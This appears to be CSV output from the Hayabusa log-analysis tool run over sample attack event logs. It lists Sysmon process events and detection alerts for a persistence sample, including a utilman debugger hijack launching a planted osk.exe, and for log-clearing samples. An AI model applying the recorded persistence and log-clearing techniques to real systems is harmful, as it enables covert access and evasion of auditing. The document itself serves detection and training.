2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe |
Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | 
PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 
365ABB72-7933-5C91-0000-00100AD30600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:48.323 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx 2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: 
